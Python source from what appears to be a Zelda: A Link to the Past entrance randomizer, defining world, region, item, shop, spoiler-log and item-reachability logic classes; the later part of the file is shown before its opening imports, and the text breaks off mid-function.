self.big_key = big_key
self.small_keys = small_keys
self.dungeon_items = dungeon_items
self.bosses = dict()
self.player = player
self.world = None
@property
def boss(self):
return self.bosses.get(None, None)
@boss.setter
def boss(self, value):
self.bosses[None] = value
@property
def keys(self):
return self.small_keys + ([self.big_key] if self.big_key else [])
@property
def all_items(self):
return self.dungeon_items + self.keys
def is_dungeon_item(self, item):
return item.player == self.player and item.name in [dungeon_item.name for dungeon_item in self.all_items]
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
class Boss(object):
def __init__(self, name, enemizer_name, defeat_rule, player):
self.name = name
self.enemizer_name = enemizer_name
self.defeat_rule = defeat_rule
self.player = player
def can_defeat(self, state):
return self.defeat_rule(state, self.player)
class Location(object):
def __init__(self, player, name='', address=None, crystal=False, hint_text=None, parent=None, player_address=None):
self.name = name
self.parent_region = parent
self.item = None
self.crystal = crystal
self.address = address
self.player_address = player_address
self.spot_type = 'Location'
self.hint_text = hint_text if hint_text is not None else 'Hyrule'
self.recursion_count = 0
self.staleness_count = 0
self.event = False
self.locked = False
self.always_allow = lambda item, state: False
self.access_rule = lambda state: True
self.item_rule = lambda item: True
self.player = player
def can_fill(self, state, item, check_access=True):
return self.always_allow(state, item) or (self.parent_region.can_fill(item) and self.item_rule(item) and (not check_access or self.can_reach(state)))
def can_reach(self, state):
if self.parent_region.can_reach(state) and self.access_rule(state):
return True
return False
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
world = self.parent_region.world if self.parent_region and self.parent_region.world else None
return world.get_name_string_for_object(self) if world else f'{self.name} (Player {self.player})'
class Item(object):
def __init__(self, name='', advancement=False, priority=False, type=None, code=None, pedestal_hint=None, pedestal_credit=None, sickkid_credit=None, zora_credit=None, witch_credit=None, fluteboy_credit=None, hint_text=None, player=None):
self.name = name
self.advancement = advancement
self.priority = priority
self.type = type
self.pedestal_hint_text = pedestal_hint
self.pedestal_credit_text = pedestal_credit
self.sickkid_credit_text = sickkid_credit
self.zora_credit_text = zora_credit
self.magicshop_credit_text = witch_credit
self.fluteboy_credit_text = fluteboy_credit
self.hint_text = hint_text
self.code = code
self.location = None
self.world = None
self.player = player
@property
def crystal(self):
return self.type == 'Crystal'
@property
def smallkey(self):
return self.type == 'SmallKey'
@property
def bigkey(self):
return self.type == 'BigKey'
@property
def map(self):
return self.type == 'Map'
@property
def compass(self):
return self.type == 'Compass'
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
# have 6 address that need to be filled
class Crystal(Item):
pass
@unique
class ShopType(Enum):
Shop = 0
TakeAny = 1
UpgradeShop = 2
class Shop(object):
def __init__(self, region, room_id, type, shopkeeper_config, custom, locked):
self.region = region
self.room_id = room_id
self.type = type
self.inventory = [None, None, None]
self.shopkeeper_config = shopkeeper_config
self.custom = custom
self.locked = locked
@property
def item_count(self):
return (3 if self.inventory[2] else
2 if self.inventory[1] else
1 if self.inventory[0] else
0)
def get_bytes(self):
# [id][roomID-low][roomID-high][doorID][zero][shop_config][shopkeeper_config][sram_index]
entrances = self.region.entrances
config = self.item_count
if len(entrances) == 1 and entrances[0].name in door_addresses:
door_id = door_addresses[entrances[0].name][0]+1
else:
door_id = 0
config |= 0x40 # ignore door id
if self.type == ShopType.TakeAny:
config |= 0x80
if self.type == ShopType.UpgradeShop:
config |= 0x10 # Alt. VRAM
return [0x00]+int16_as_bytes(self.room_id)+[door_id, 0x00, config, self.shopkeeper_config, 0x00]
def has_unlimited(self, item):
for inv in self.inventory:
if inv is None:
continue
if inv['max'] != 0 and inv['replacement'] is not None and inv['replacement'] == item:
return True
elif inv['item'] is not None and inv['item'] == item:
return True
return False
def clear_inventory(self):
self.inventory = [None, None, None]
def add_inventory(self, slot, item, price, max=0, replacement=None, replacement_price=0, create_location=False):
self.inventory[slot] = {
'item': item,
'price': price,
'max': max,
'replacement': replacement,
'replacement_price': replacement_price,
'create_location': create_location
}
class Spoiler(object):
def __init__(self, world):
self.world = world
self.hashes = {}
self.entrances = OrderedDict()
self.medallions = {}
self.playthrough = {}
self.unreachables = []
self.startinventory = []
self.locations = {}
self.paths = {}
self.metadata = {}
self.shops = []
self.bosses = OrderedDict()
def set_entrance(self, entrance, exit, direction, player):
if self.world.players == 1:
self.entrances[(entrance, direction, player)] = OrderedDict([('entrance', entrance), ('exit', exit), ('direction', direction)])
else:
self.entrances[(entrance, direction, player)] = OrderedDict([('player', player), ('entrance', entrance), ('exit', exit), ('direction', direction)])
def parse_data(self):
self.medallions = OrderedDict()
if self.world.players == 1:
self.medallions['Misery Mire'] = self.world.required_medallions[1][0]
self.medallions['Turtle Rock'] = self.world.required_medallions[1][1]
else:
for player in range(1, self.world.players + 1):
self.medallions[f'Misery Mire ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][0]
self.medallions[f'Turtle Rock ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][1]
self.startinventory = list(map(str, self.world.precollected_items))
self.locations = OrderedDict()
listed_locations = set()
lw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.LightWorld]
self.locations['Light World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in lw_locations])
listed_locations.update(lw_locations)
dw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.DarkWorld]
self.locations['Dark World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dw_locations])
listed_locations.update(dw_locations)
cave_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.Cave]
self.locations['Caves'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in cave_locations])
listed_locations.update(cave_locations)
for dungeon in self.world.dungeons:
dungeon_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.dungeon == dungeon]
self.locations[str(dungeon)] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dungeon_locations])
listed_locations.update(dungeon_locations)
other_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations]
if other_locations:
self.locations['Other Locations'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in other_locations])
listed_locations.update(other_locations)
self.shops = []
for shop in self.world.shops:
if not shop.custom:
continue
shopdata = {'location': str(shop.region),
'type': 'Take Any' if shop.type == ShopType.TakeAny else 'Shop'
}
for index, item in enumerate(shop.inventory):
if item is None:
continue
shopdata['item_{}'.format(index)] = "{} — {}".format(item['item'], item['price']) if item['price'] else item['item']
self.shops.append(shopdata)
for player in range(1, self.world.players + 1):
self.bosses[str(player)] = OrderedDict()
self.bosses[str(player)]["Eastern Palace"] = self.world.get_dungeon("Eastern Palace", player).boss.name
self.bosses[str(player)]["Desert Palace"] = self.world.get_dungeon("Desert Palace", player).boss.name
self.bosses[str(player)]["Tower Of Hera"] = self.world.get_dungeon("Tower of Hera", player).boss.name
self.bosses[str(player)]["Hyrule Castle"] = "Agahnim"
self.bosses[str(player)]["Palace Of Darkness"] = self.world.get_dungeon("Palace of Darkness", player).boss.name
self.bosses[str(player)]["Swamp Palace"] = self.world.get_dungeon("Swamp Palace", player).boss.name
self.bosses[str(player)]["Skull Woods"] = self.world.get_dungeon("Skull Woods", player).boss.name
self.bosses[str(player)]["Thieves Town"] = self.world.get_dungeon("Thieves Town", player).boss.name
self.bosses[str(player)]["Ice Palace"] = self.world.get_dungeon("Ice Palace", player).boss.name
self.bosses[str(player)]["Misery Mire"] = self.world.get_dungeon("Misery Mire", player).boss.name
self.bosses[str(player)]["Turtle Rock"] = self.world.get_dungeon("Turtle Rock", player).boss.name
if self.world.mode[player] != 'inverted':
self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Ganons Tower', player).bosses['bottom'].name
self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Ganons Tower', player).bosses['middle'].name
self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Ganons Tower', player).bosses['top'].name
else:
self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['bottom'].name
self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['middle'].name
self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['top'].name
self.bosses[str(player)]["Ganons Tower"] = "Agahnim 2"
self.bosses[str(player)]["Ganon"] = "Ganon"
if self.world.players == 1:
self.bosses = self.bosses["1"]
from Main import __version__ as ERVersion
self.metadata = {'version': ERVersion,
'logic': self.world.logic,
'mode': self.world.mode,
'retro': self.world.retro,
'weapons': self.world.swords,
'goal': self.world.goal,
'shuffle': self.world.shuffle,
'item_pool': self.world.difficulty,
'item_functionality': self.world.difficulty_adjustments,
'gt_crystals': self.world.crystals_needed_for_gt,
'ganon_crystals': self.world.crystals_needed_for_ganon,
'open_pyramid': self.world.open_pyramid,
'accessibility': self.world.accessibility,
'hints': self.world.hints,
'mapshuffle': self.world.mapshuffle,
'compassshuffle': self.world.compassshuffle,
'keyshuffle': self.world.keyshuffle,
'bigkeyshuffle': self.world.bigkeyshuffle,
'boss_shuffle': self.world.boss_shuffle,
'enemy_shuffle': self.world.enemy_shuffle,
'enemy_health': self.world.enemy_health,
'enemy_damage': self.world.enemy_damage,
'beemizer': self.world.beemizer,
'progressive': self.world.progressive,
'shufflepots': self.world.shufflepots,
'players': self.world.players,
'teams': self.world.teams
}
def to_json(self):
self.parse_data()
out = OrderedDict()
out['Entrances'] = list(self.entrances.values())
out.update(self.locations)
out['Starting Inventory'] = self.startinventory
out['Special'] = self.medallions
if self.hashes:
out['Hashes'] = {f"{self.world.player_names[player][team]} (Team {team+1})": hash for (player, team), hash in self.hashes.items()}
if self.shops:
out['Shops'] = self.shops
out['playthrough'] = self.playthrough
out['paths'] = self.paths
out['Bosses'] = self.bosses
out['meta'] = self.metadata
return json.dumps(out)
def to_file(self, filename):
self.parse_data()
with open(filename, 'w') as outfile:
outfile.write('ALttP Entrance Randomizer Version %s - Seed: %s\n\n' % (self.metadata['version'], self.world.seed))
outfile.write('Filling Algorithm: %s\n' % self.world.algorithm)
outfile.write('Players: %d\n' % self.world.players)
outfile.write('Teams: %d\n' % self.world.teams)
for player in range(1, self.world.players + 1):
if self.world.players > 1:
outfile.write('\nPlayer %d: %s\n' % (player, self.world.get_player_names(player)))
for team in range(self.world.teams):
outfile.write('%s%s\n' % (f"Hash - {self.world.player_names[player][team]} (Team {team+1}): " if self.world.teams > 1 else 'Hash: ', self.hashes[player, team]))
outfile.write('Logic: %s\n' % self.metadata['logic'][player])
outfile.write('Mode: %s\n' % self.metadata['mode'][player])
outfile.write('Retro: %s\n' % ('Yes' if self.metadata['retro'][player] else 'No'))
outfile.write('Swords: %s\n' % self.metadata['weapons'][player])
outfile.write('Goal: %s\n' % self.metadata['goal'][player])
outfile.write('Difficulty: %s\n' % self.metadata['item_pool'][player])
outfile.write('Item Functionality: %s\n' % self.metadata['item_functionality'][player])
outfile.write('Item Progression: %s\n' % self.metadata['progressive'][player])
outfile.write('Entrance Shuffle: %s\n' % self.metadata['shuffle'][player])
outfile.write('Crystals required for GT: %s\n' % self.metadata['gt_crystals'][player])
outfile.write('Crystals required for Ganon: %s\n' % self.metadata['ganon_crystals'][player])
outfile.write('Pyramid hole pre-opened: %s\n' % ('Yes' if self.metadata['open_pyramid'][player] else 'No'))
outfile.write('Accessibility: %s\n' % self.metadata['accessibility'][player])
outfile.write('Map shuffle: %s\n' % ('Yes' if self.metadata['mapshuffle'][player] else 'No'))
outfile.write('Compass shuffle: %s\n' % ('Yes' if self.metadata['compassshuffle'][player] else 'No'))
outfile.write('Small Key shuffle: %s\n' % ('Yes' if self.metadata['keyshuffle'][player] else 'No'))
outfile.write('Big Key shuffle: %s\n' % ('Yes' if self.metadata['bigkeyshuffle'][player] else 'No'))
outfile.write('Boss shuffle: %s\n' % self.metadata['boss_shuffle'][player])
outfile.write('Enemy shuffle: %s\n' % self.metadata['enemy_shuffle'][player])
outfile.write('Enemy health: %s\n' % self.metadata['enemy_health'][player])
outfile.write('Enemy damage: %s\n' % self.metadata['enemy_damage'][player])
outfile.write('Hints: %s\n' % ('Yes' if self.metadata['hints'][player] else 'No'))
outfile.write('Beemizer: %s\n' % self.metadata['beemizer'][player])
outfile.write('Pot shuffle %s\n' % ('Yes' if self.metadata['shufflepots'][player] else 'No'))
if self.entrances:
outfile.write('\n\nEntrances:\n\n')
outfile.write('\n'.join(['%s%s %s %s' % (f'{self.world.get_player_names(entry['player'])}: ' if self.world.players > 1 else '', entry['entrance'], '<=>' if entry['direction'] == 'both' else '<=' if entry['direction'] == 'exit' else '=>', entry['exit']) for entry in self.entrances.values()]))
outfile.write('\n\nMedallions:\n')
for dungeon, medallion in self.medallions.items():
outfile.write(f'\n{dungeon}: {medallion}')
if self.startinventory:
outfile.write('\n\nStarting Inventory:\n\n')
outfile.write('\n'.join(self.startinventory))
outfile.write('\n\nLocations:\n\n')
outfile.write('\n'.join(['%s: %s' % (location, item) for grouping in self.locations.values() for (location, item) in grouping.items()]))
outfile.write('\n\nShops:\n\n')
outfile.write('\n'.join("{} [{}]\n {}".format(shop['location'], shop['type'], "\n ".join(item for item in [shop.get('item_0', None), shop.get('item_1', None), shop.get('item_2', None)] if item)) for shop in self.shops))
outfile.write('\n\nPlaythrough:\n\n')
outfile.write('\n'.join(['%s: {\n%s\n}' % (sphere_nr, '\n'.join([' %s: %s' % (location, item) for (location, item) in sphere.items()] if sphere_nr != '0' else [f' {item}' for item in sphere])) for (sphere_nr, sphere) in self.playthrough.items()]))
if self.unreachables:
outfile.write('\n\nUnreachable Items:\n\n')
outfile.write('\n'.join(['%s: %s' % (unreachable.item, unreachable) for unreachable in self.unreachables]))
outfile.write('\n\nPaths:\n\n')
path_listings = []
for location, path in sorted(self.paths.items()):
path_lines = []
for region, exit in path:
if exit is not None:
path_lines.append("{} -> {}".format(region, exit))
else:
path_lines.append(region)
path_listings.append("{}\n {}".format(location, "\n => ".join(path_lines)))
outfile.write('\n'.join(path_listings))
| import copy
from enum import Enum, unique
import logging
import json
from collections import OrderedDict
from collections_extended import bag
from EntranceShuffle import door_addresses
from Utils import int16_as_bytes
class World(object):
def __init__(self, players, shuffle, logic, mode, swords, difficulty, difficulty_adjustments, timer, progressive, goal, algorithm, accessibility, shuffle_ganon, retro, custom, customitemarray, hints):
self.players = players
self.teams = 1
self.shuffle = shuffle.copy()
self.logic = logic.copy()
self.mode = mode.copy()
self.swords = swords.copy()
self.difficulty = difficulty.copy()
self.difficulty_adjustments = difficulty_adjustments.copy()
self.timer = timer
self.progressive = progressive
self.goal = goal.copy()
self.algorithm = algorithm
self.dungeons = []
self.regions = []
self.shops = []
self.itempool = []
self.seed = None
self.precollected_items = []
self.state = CollectionState(self)
self._cached_entrances = None
self._cached_locations = None
self._entrance_cache = {}
self._location_cache = {}
self.required_locations = []
self.shuffle_bonk_prizes = False
self.light_world_light_cone = False
self.dark_world_light_cone = False
self.clock_mode = 'off'
self.rupoor_cost = 10
self.aga_randomness = True
self.lock_aga_door_in_escape = False
self.save_and_quit_from_boss = True
self.accessibility = accessibility.copy()
self.shuffle_ganon = shuffle_ganon
self.fix_gtower_exit = self.shuffle_ganon
self.retro = retro.copy()
self.custom = custom
self.customitemarray = customitemarray
self.can_take_damage = True
self.hints = hints.copy()
self.dynamic_regions = []
self.dynamic_locations = []
self.spoiler = Spoiler(self)
self.lamps_needed_for_dark_rooms = 1
for player in range(1, players + 1):
def set_player_attr(attr, val):
self.__dict__.setdefault(attr, {})[player] = val
set_player_attr('_region_cache', {})
set_player_attr('player_names', [])
set_player_attr('remote_items', False)
set_player_attr('required_medallions', ['Ether', 'Quake'])
set_player_attr('swamp_patch_required', False)
set_player_attr('powder_patch_required', False)
set_player_attr('ganon_at_pyramid', True)
set_player_attr('ganonstower_vanilla', True)
set_player_attr('sewer_light_cone', self.mode[player] == 'standard')
set_player_attr('fix_trock_doors', self.shuffle[player] != 'vanilla' or self.mode[player] == 'inverted')
set_player_attr('fix_skullwoods_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
set_player_attr('fix_palaceofdarkness_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
set_player_attr('fix_trock_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
set_player_attr('can_access_trock_eyebridge', None)
set_player_attr('can_access_trock_front', None)
set_player_attr('can_access_trock_big_chest', None)
set_player_attr('can_access_trock_middle', None)
set_player_attr('fix_fake_world', True)
set_player_attr('mapshuffle', False)
set_player_attr('compassshuffle', False)
set_player_attr('keyshuffle', False)
set_player_attr('bigkeyshuffle', False)
set_player_attr('difficulty_requirements', None)
set_player_attr('boss_shuffle', 'none')
set_player_attr('enemy_shuffle', 'none')
set_player_attr('enemy_health', 'default')
set_player_attr('enemy_damage', 'default')
set_player_attr('beemizer', 0)
set_player_attr('progressive', 'on')
set_player_attr('escape_assist', [])
set_player_attr('crystals_needed_for_ganon', 7)
set_player_attr('crystals_needed_for_gt', 7)
set_player_attr('open_pyramid', False)
set_player_attr('treasure_hunt_icon', 'Triforce Piece')
set_player_attr('treasure_hunt_count', 0)
def get_name_string_for_object(self, obj):
return obj.name if self.players == 1 else f'{obj.name} ({self.get_player_names(obj.player)})'
def get_player_names(self, player):
return ", ".join([name for i, name in enumerate(self.player_names[player]) if self.player_names[player].index(name) == i])
def initialize_regions(self, regions=None):
for region in regions if regions else self.regions:
region.world = self
self._region_cache[region.player][region.name] = region
def get_regions(self, player=None):
return self.regions if player is None else self._region_cache[player].values()
def get_region(self, regionname, player):
if isinstance(regionname, Region):
return regionname
try:
return self._region_cache[player][regionname]
except KeyError:
for region in self.regions:
if region.name == regionname and region.player == player:
assert not region.world # this should only happen before initialization
return region
raise RuntimeError('No such region %s for player %d' % (regionname, player))
def get_entrance(self, entrance, player):
if isinstance(entrance, Entrance):
return entrance
try:
return self._entrance_cache[(entrance, player)]
except KeyError:
for region in self.regions:
for exit in region.exits:
if exit.name == entrance and exit.player == player:
self._entrance_cache[(entrance, player)] = exit
return exit
raise RuntimeError('No such entrance %s for player %d' % (entrance, player))
def get_location(self, location, player):
if isinstance(location, Location):
return location
try:
return self._location_cache[(location, player)]
except KeyError:
for region in self.regions:
for r_location in region.locations:
if r_location.name == location and r_location.player == player:
self._location_cache[(location, player)] = r_location
return r_location
raise RuntimeError('No such location %s for player %d' % (location, player))
def get_dungeon(self, dungeonname, player):
if isinstance(dungeonname, Dungeon):
return dungeonname
for dungeon in self.dungeons:
if dungeon.name == dungeonname and dungeon.player == player:
return dungeon
raise RuntimeError('No such dungeon %s for player %d' % (dungeonname, player))
def get_all_state(self, keys=False):
ret = CollectionState(self)
def soft_collect(item):
if item.name.startswith('Progressive '):
if 'Sword' in item.name:
if ret.has('Golden Sword', item.player):
pass
elif ret.has('Tempered Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 4:
ret.prog_items.add(('Golden Sword', item.player))
elif ret.has('Master Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 3:
ret.prog_items.add(('Tempered Sword', item.player))
elif ret.has('Fighter Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 2:
ret.prog_items.add(('Master Sword', item.player))
elif self.difficulty_requirements[item.player].progressive_sword_limit >= 1:
ret.prog_items.add(('Fighter Sword', item.player))
elif 'Glove' in item.name:
if ret.has('Titans Mitts', item.player):
pass
elif ret.has('Power Glove', item.player):
ret.prog_items.add(('Titans Mitts', item.player))
else:
ret.prog_items.add(('Power Glove', item.player))
elif 'Shield' in item.name:
if ret.has('Mirror Shield', item.player):
pass
elif ret.has('Red Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 3:
ret.prog_items.add(('Mirror Shield', item.player))
elif ret.has('Blue Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 2:
ret.prog_items.add(('Red Shield', item.player))
elif self.difficulty_requirements[item.player].progressive_shield_limit >= 1:
ret.prog_items.add(('Blue Shield', item.player))
elif 'Bow' in item.name:
if ret.has('Silver Arrows', item.player):
pass
elif ret.has('Bow', item.player) and self.difficulty_requirements[item.player].progressive_bow_limit >= 2:
ret.prog_items.add(('Silver Arrows', item.player))
elif self.difficulty_requirements[item.player].progressive_bow_limit >= 1:
ret.prog_items.add(('Bow', item.player))
elif item.name.startswith('Bottle'):
if ret.bottle_count(item.player) < self.difficulty_requirements[item.player].progressive_bottle_limit:
ret.prog_items.add((item.name, item.player))
elif item.advancement or item.smallkey or item.bigkey:
ret.prog_items.add((item.name, item.player))
for item in self.itempool:
soft_collect(item)
if keys:
for p in range(1, self.players + 1):
from Items import ItemFactory
for item in ItemFactory(['Small Key (Escape)', 'Big Key (Eastern Palace)', 'Big Key (Desert Palace)', 'Small Key (Desert Palace)', 'Big Key (Tower of Hera)', 'Small Key (Tower of Hera)', 'Small Key (Agahnims Tower)', 'Small Key (Agahnims Tower)',
'Big Key (Palace of Darkness)'] + ['Small Key (Palace of Darkness)'] * 6 + ['Big Key (Thieves Town)', 'Small Key (Thieves Town)', 'Big Key (Skull Woods)'] + ['Small Key (Skull Woods)'] * 3 + ['Big Key (Swamp Palace)',
'Small Key (Swamp Palace)', 'Big Key (Ice Palace)'] + ['Small Key (Ice Palace)'] * 2 + ['Big Key (Misery Mire)', 'Big Key (Turtle Rock)', 'Big Key (Ganons Tower)'] + ['Small Key (Misery Mire)'] * 3 + ['Small Key (Turtle Rock)'] * 4 + ['Small Key (Ganons Tower)'] * 4,
p):
soft_collect(item)
ret.sweep_for_events()
return ret
def get_items(self):
return [loc.item for loc in self.get_filled_locations()] + self.itempool
def find_items(self, item, player):
return [location for location in self.get_locations() if location.item is not None and location.item.name == item and location.item.player == player]
def push_precollected(self, item):
item.world = self
if (item.smallkey and self.keyshuffle[item.player]) or (item.bigkey and self.bigkeyshuffle[item.player]):
item.advancement = True
self.precollected_items.append(item)
self.state.collect(item, True)
def push_item(self, location, item, collect=True):
if not isinstance(location, Location):
raise RuntimeError('Cannot assign item %s to location %s (player %d).' % (item, location, item.player))
if location.can_fill(self.state, item, False):
location.item = item
item.location = location
item.world = self
if collect:
self.state.collect(item, location.event, location)
logging.getLogger('').debug('Placed %s at %s', item, location)
else:
raise RuntimeError('Cannot assign item %s to location %s.' % (item, location))
def get_entrances(self):
if self._cached_entrances is None:
self._cached_entrances = []
for region in self.regions:
self._cached_entrances.extend(region.entrances)
return self._cached_entrances
def clear_entrance_cache(self):
self._cached_entrances = None
def get_locations(self):
if self._cached_locations is None:
self._cached_locations = []
for region in self.regions:
self._cached_locations.extend(region.locations)
return self._cached_locations
def clear_location_cache(self):
self._cached_locations = None
def get_unfilled_locations(self, player=None):
return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is None]
def get_filled_locations(self, player=None):
return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is not None]
def get_reachable_locations(self, state=None, player=None):
if state is None:
state = self.state
return [location for location in self.get_locations() if (player is None or location.player == player) and location.can_reach(state)]
def get_placeable_locations(self, state=None, player=None):
if state is None:
state = self.state
return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is None and location.can_reach(state)]
def unlocks_new_location(self, item):
temp_state = self.state.copy()
temp_state.collect(item, True)
for location in self.get_unfilled_locations():
if temp_state.can_reach(location) and not self.state.can_reach(location):
return True
return False
def has_beaten_game(self, state, player=None):
if player:
return state.has('Triforce', player)
else:
return all((self.has_beaten_game(state, p) for p in range(1, self.players + 1)))
def can_beat_game(self, starting_state=None):
if starting_state:
state = starting_state.copy()
else:
state = CollectionState(self)
if self.has_beaten_game(state):
return True
prog_locations = [location for location in self.get_locations() if location.item is not None and (location.item.advancement or location.event) and location not in state.locations_checked]
while prog_locations:
sphere = []
# build up spheres of collection radius. Everything in each sphere is independent from each other in dependencies and only depends on lower spheres
for location in prog_locations:
if location.can_reach(state):
sphere.append(location)
if not sphere:
# ran out of places and did not finish yet, quit
return False
for location in sphere:
prog_locations.remove(location)
state.collect(location.item, True, location)
if self.has_beaten_game(state):
return True
return False
class CollectionState(object):
def __init__(self, parent):
self.prog_items = bag()
self.world = parent
self.reachable_regions = {player: set() for player in range(1, parent.players + 1)}
self.events = []
self.path = {}
self.locations_checked = set()
self.stale = {player: True for player in range(1, parent.players + 1)}
for item in parent.precollected_items:
self.collect(item, True)
def update_reachable_regions(self, player):
player_regions = self.world.get_regions(player)
self.stale[player] = False
rrp = self.reachable_regions[player]
new_regions = True
reachable_regions_count = len(rrp)
while new_regions:
player_regions = [region for region in player_regions if region not in rrp]
for candidate in player_regions:
if candidate.can_reach_private(self):
rrp.add(candidate)
new_regions = len(rrp) > reachable_regions_count
reachable_regions_count = len(rrp)
def copy(self):
ret = CollectionState(self.world)
ret.prog_items = self.prog_items.copy()
ret.reachable_regions = {player: copy.copy(self.reachable_regions[player]) for player in range(1, self.world.players + 1)}
ret.events = copy.copy(self.events)
ret.path = copy.copy(self.path)
ret.locations_checked = copy.copy(self.locations_checked)
return ret
def can_reach(self, spot, resolution_hint=None, player=None):
try:
spot_type = spot.spot_type
except AttributeError:
# try to resolve a name
if resolution_hint == 'Location':
spot = self.world.get_location(spot, player)
elif resolution_hint == 'Entrance':
spot = self.world.get_entrance(spot, player)
else:
# default to Region
spot = self.world.get_region(spot, player)
return spot.can_reach(self)
def sweep_for_events(self, key_only=False, locations=None):
# this may need improvement
if locations is None:
locations = self.world.get_filled_locations()
new_locations = True
checked_locations = 0
while new_locations:
reachable_events = [location for location in locations if location.event and
(not key_only or (not self.world.keyshuffle[location.item.player] and location.item.smallkey) or (not self.world.bigkeyshuffle[location.item.player] and location.item.bigkey))
and location.can_reach(self)]
for event in reachable_events:
if (event.name, event.player) not in self.events:
self.events.append((event.name, event.player))
self.collect(event.item, True, event)
new_locations = len(reachable_events) > checked_locations
checked_locations = len(reachable_events)
def has(self, item, player, count=1):
if count == 1:
return (item, player) in self.prog_items
return self.prog_items.count((item, player)) >= count
def has_key(self, item, player, count=1):
if self.world.retro[player]:
return self.can_buy_unlimited('Small Key (Universal)', player)
if count == 1:
return (item, player) in self.prog_items
return self.prog_items.count((item, player)) >= count
def can_buy_unlimited(self, item, player):
for shop in self.world.shops:
if shop.region.player == player and shop.has_unlimited(item) and shop.region.can_reach(self):
return True
return False
def item_count(self, item, player):
return self.prog_items.count((item, player))
def has_crystals(self, count, player):
crystals = ['Crystal 1', 'Crystal 2', 'Crystal 3', 'Crystal 4', 'Crystal 5', 'Crystal 6', 'Crystal 7']
return len([crystal for crystal in crystals if self.has(crystal, player)]) >= count
def can_lift_rocks(self, player):
return self.has('Power Glove', player) or self.has('Titans Mitts', player)
def has_bottle(self, player):
return self.bottle_count(player) > 0
def bottle_count(self, player):
return len([item for (item, itemplayer) in self.prog_items if item.startswith('Bottle') and itemplayer == player])
def has_hearts(self, player, count):
# Warning: This only considers items that are marked as advancement items
return self.heart_count(player) >= count
def heart_count(self, player):
# Warning: This only considers items that are marked as advancement items
diff = self.world.difficulty_requirements[player]
return (
min(self.item_count('Boss Heart Container', player), diff.boss_heart_container_limit)
+ self.item_count('Sanctuary Heart Container', player)
+ min(self.item_count('Piece of Heart', player), diff.heart_piece_limit) // 4
+ 3 # starting hearts
)
def can_lift_heavy_rocks(self, player):
return self.has('Titans Mitts', player)
def can_extend_magic(self, player, smallmagic=16, fullrefill=False): #This reflects the total magic Link has, not the total extra he has.
basemagic = 8
if self.has('Quarter Magic', player):
basemagic = 32
elif self.has('Half Magic', player):
basemagic = 16
if self.can_buy_unlimited('Green Potion', player) or self.can_buy_unlimited('Blue Potion', player):
if self.world.difficulty_adjustments[player] == 'hard' and not fullrefill:
basemagic = basemagic + int(basemagic * 0.5 * self.bottle_count(player))
elif self.world.difficulty_adjustments[player] == 'expert' and not fullrefill:
basemagic = basemagic + int(basemagic * 0.25 * self.bottle_count(player))
else:
basemagic = basemagic + basemagic * self.bottle_count(player)
return basemagic >= smallmagic
def can_kill_most_things(self, player, enemies=5):
return (self.has_blunt_weapon(player)
or self.has('Cane of Somaria', player)
or (self.has('Cane of Byrna', player) and (enemies < 6 or self.can_extend_magic(player)))
or self.can_shoot_arrows(player)
or self.has('Fire Rod', player)
)
def can_shoot_arrows(self, player):
if self.world.retro[player]:
#TODO: need to decide how we want to handle wooden arrows longer-term (a can-buy-a check, or via dynamic shop location)
#FIXME: Should do something about hard+ ganon only silvers. For the moment, i believe they effective grant wooden, so we are safe
return self.has('Bow', player) and (self.has('Silver Arrows', player) or self.can_buy_unlimited('Single Arrow', player))
return self.has('Bow', player)
def can_get_good_bee(self, player):
cave = self.world.get_region('Good Bee Cave', player)
return (
self.has_bottle(player) and
self.has('Bug Catching Net', player) and
(self.has_Boots(player) or (self.has_sword(player) and self.has('Quake', player))) and
cave.can_reach(self) and
self.is_not_bunny(cave, player)
)
def has_sword(self, player):
return self.has('Fighter Sword', player) or self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)
def has_beam_sword(self, player):
return self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)
def has_blunt_weapon(self, player):
return self.has_sword(player) or self.has('Hammer', player)
def has_Mirror(self, player):
return self.has('Magic Mirror', player)
def has_Boots(self, player):
return self.has('Pegasus Boots', player)
def has_Pearl(self, player):
return self.has('Moon Pearl', player)
def has_fire_source(self, player):
